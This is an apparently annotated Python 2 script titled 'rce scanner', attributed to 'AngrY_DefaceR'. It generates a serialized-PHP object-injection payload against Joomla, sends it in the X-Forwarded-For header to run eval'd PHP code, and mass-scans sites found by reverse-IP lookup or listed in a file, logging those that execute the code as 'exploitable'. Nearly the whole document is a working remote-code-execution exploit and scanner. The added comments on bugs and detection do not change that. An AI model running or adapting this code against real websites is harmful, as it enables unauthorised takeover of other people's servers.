AngrY_DefaceR

rce scanner

Aug 24th, 2016
  1. import sys
  2. import re
  3. import requests
  4. import getopt
# Module-level error slot shared with get_url() and check_sites(): get_url()
# stores the last exception text here and check_sites() prints it, then
# resets it to "--".
message = "--"
# NOTE(review): a plain string, but requests' proxies= parameter takes a
# dict keyed by URL scheme, so this value cannot be used as written; only
# get_ip() references it and nothing in this listing calls get_ip().
proxy = ("--proxy 91.194.77.112:65520")
  7.  
def get_ip():
    """Return the raw body of http://icanhazip.com fetched via ``proxy``.

    NOTE(review): ``proxy`` is a module-level string, while requests expects
    a dict for ``proxies=``; this call is therefore expected to fail. The
    function is not called anywhere in this listing.
    """
    ip = requests.get('http://icanhazip.com', proxies=proxy).content
    return ip
def get_url(url, user_agent):
   """GET ``url`` with ``user_agent`` placed in the X-Forwarded-For header.

   Despite the parameter name, the value is sent as ``x-forwarded-for``;
   the User-Agent line is commented out. An initial request is made and
   its cookies are reused for three identical follow-up requests; the body
   of the last one is returned. On any exception the error text is stored
   in the module-level ``message`` and None is returned.

   Detection note: the request line is an ordinary GET — the only unusual
   element is the X-Forwarded-For value, so logging or inspection that
   drops that header will not see this traffic.
   """
   global message        
   headers = {
   #'User-Agent': user_agent  
   # the supplied string is sent as the client-IP header, not as User-Agent
   'x-forwarded-for': user_agent
   }
   response = None
   try:
     # first request only to collect cookies, which are replayed below
     cookies = requests.get(url, timeout=15, headers=headers).cookies
 
     # three identical requests; only the last response is kept
     for _ in range(3):
       response = requests.get(url, timeout=15, headers=headers,cookies=cookies)  
   except Exception as ex:
     #print ex.message
     # ex.message exists on Python 2 exceptions only; on Python 3 this
     # line raises AttributeError inside the handler
     message = "Error: " + str(ex.message)
   if response:
     # NOTE(review): a requests.Response is falsy for 4xx/5xx status codes,
     # so an error reply falls through to `return None` — confirm
     return response.content
   return None
  31.    
def php_str_noquotes(data):
  """Return ``data`` as a PHP ``chr(N).chr(N)...`` expression.

  Each character becomes ``chr(<ordinal>)`` and the pieces are joined with
  PHP's ``.`` concatenation operator, so the result contains no quote
  characters. An empty ``data`` yields an empty string.
  """
  pieces = ["chr({0})".format(ord(symbol)) for symbol in data]
  return ".".join(pieces)
def generate_payload(php_payload):
  """Embed ``php_payload`` in the fixed serialized-PHP-object template.

  The PHP snippet is first rewritten as ``eval(chr(..).chr(..)...)`` so it
  contains no quote characters, then spliced into a constant template as a
  length-prefixed string field; four trailing non-ASCII characters are
  appended. The result is what get_url() sends in the X-Forwarded-For
  header.

  Detection note: everything outside the injected field — in particular the
  leading ``}__test|O:21:"JDatabaseDriverMysqli"`` text — is identical for
  every payload, so those constant fragments are what a header-inspection
  rule can match on.
  """
  # quote-free form of the snippet
  php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  # four characters appended after the template (the stray ';' is harmless)
  terminate = '\xf0\xfd\xfd\xfd';
  # constant prefix of the serialized-object template
  exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  # the variable part: the eval() call followed by fixed trailing PHP
  injected_payload = "{};JFactory::getConfig();exit".format(php_payload)  
  # length-prefixed string field: s:<len>:"<text>"
  exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  # constant suffix of the template
  exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  return exploit_template
def get_site_list(domain):
   """Return hostnames listed for ``domain`` by viewdns.info's reverse lookup.

   Issues one GET with a fixed desktop-browser User-Agent and regex-scrapes
   the first cell of each table row from the HTML.

   NOTE(review): if the request or the parsing raises, the handler prints
   the literal text "ex.message" (the name is quoted by mistake) and
   ``sites`` is never bound, so ``return sites`` raises UnboundLocalError.
   """
   url = "http://viewdns.info/reverseip/?host=" + domain  + "&t=1"
   headers = {
   
   # fixed browser-like User-Agent string
   'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'  
     
   }
 
   #print url
   try:
     response = requests.get(url, timeout=15, headers = headers)
     text =  response.content
     #print text
     # non-raw pattern: `\s` is an unrecognised escape in a plain str
     # literal (a warning on newer Pythons). NOTE(review): on Python 3
     # `.content` is bytes and a str pattern would raise TypeError — this
     # listing is Python 2 code.
     sites = re.findall("<tr>\s+<td>(.*?)</td><td align=", text)
   except Exception as ex:
     # prints the literal string, not the exception text
     print ("ex.message")
   return sites
  63.    
  64.  
def check_sites(site_list, pl, do_log, log_file):
   """Send ``pl`` to every host in ``site_list``; print and optionally log one line per host.

   A host is reported "exploitable" when the response body matches the
   pattern ``"phpinfo()"``. NOTE(review): the parentheses form an empty
   regex group, so the pattern matches the bare word "phpinfo" wherever it
   appears, and any page that merely mentions it is reported the same way —
   expect false positives in the log. Hosts with no response get the
   module-level ``message`` (last error text), which is then reset to "--".

   When ``do_log`` is true each line is appended to ``log_file``, which is
   reopened for every host. The progress line uses Python 2 print-statement
   syntax; on Python 3 ``print(...) + ...`` raises TypeError.
   """
   global message
   i = 1
   count = len(site_list)
   for site in site_list:
     # entries from a file still carry their trailing newline
     site = site.strip()
     # prefixes the scheme unless "http://" occurs anywhere in the string
     # (find, not startswith)
     if(site.find("http://") == -1 ):
       host = "http://"+site
     else:
       host = site
     #print host
     resp = get_url(host ,pl)
     if resp != None:      
       lstr = ""
       # "phpinfo()" — the "()" is an empty group, so this is a search for
       # the word "phpinfo"
       m = re.search("phpinfo()", resp)
       if m:
        lstr = host + " exploitable"
       else :
         lstr =  host + " --"
     else:
       #print "error!"
       # get_url() stored the error text in `message`; consume and reset it
       lstr = host + " " + message
       message = "--"
     # Python 2 print statement: ("[") is just the first operand of the +
     print ("[") + str(i) + "/" + str(count) + "] "+ lstr
     i = i + 1
     if(do_log == True):
       # open/append/close per host so partial results survive an abort
       log_file_handle = open(log_file, "a")
       log_file_handle.write(lstr+"\n")
       log_file_handle.close()
  94.  
def usage():
   """Print the command-line help for this script to stdout."""
   prog = sys.argv[0]
   help_lines = [
      "Usage: " + prog + " <options>",
      "Options:",
      "-d, --domain   domain for reverse lookup on viewdns.info",
      "-f, --file   file with site list to check",
      "-l, --log   save result to log file",
      "Example: " + prog + " --file domains.txt --log output.txt",
   ]
   for line in help_lines:
      print(line)
  103.  
  104.  
  105.  
  106.  
# Script entry point: parse options, prepare the log file, then run
# check_sites() over either a reverse-lookup result or a host-list file.

# one payload for the whole run; check_sites() looks for the snippet's
# name in each response body
pl = generate_payload("phpinfo();")
#text = get_url(host, pl)
 
# command-line state, filled in by the getopt loop below
write_log = False
log_file = ""
domain = ""
read_file = ""
# NOTE(review): getopt.GetoptError (unknown option, missing argument) is
# not caught here and surfaces as a traceback instead of usage()
opts, args = getopt.getopt(sys.argv[1:], "f:d:l:", ["file=","domain=","log="]);
 
for opt, arg in opts:
   if opt in("-f", "--file"):
     read_file = arg
   elif opt in("-d", "--domain"):
     domain = arg
   elif opt in("-l", "--log"):
     log_file = arg
     write_log = True
 
# --domain and --file are mutually exclusive
if(domain and read_file):
   usage()
   # exit() is the site-module helper; sys.exit() is the conventional form
   exit()
 
# one of the two inputs is required
if(domain == "" and read_file == ""):
   usage()
   exit()
 
# truncate (or create) the log file up front; check_sites() appends to it
if(write_log == True):
   
   fh = open(log_file, "w")
   fh.close()
 
# host source: reverse lookup on viewdns.info, or a local file
 
if(domain):
   sites = get_site_list(domain)
   #print sites
   print ("Total " +str(len(sites)) + " sites to check")
   check_sites(sites, pl, write_log, log_file)
elif(read_file):
   # lines keep their trailing newline here; check_sites() strips them
   fh = open(read_file,"r")
   data = fh.readlines()
   fh.close()
   print ("Total " +str(len(data)) + " sites to check")
   check_sites(data, pl, write_log, log_file)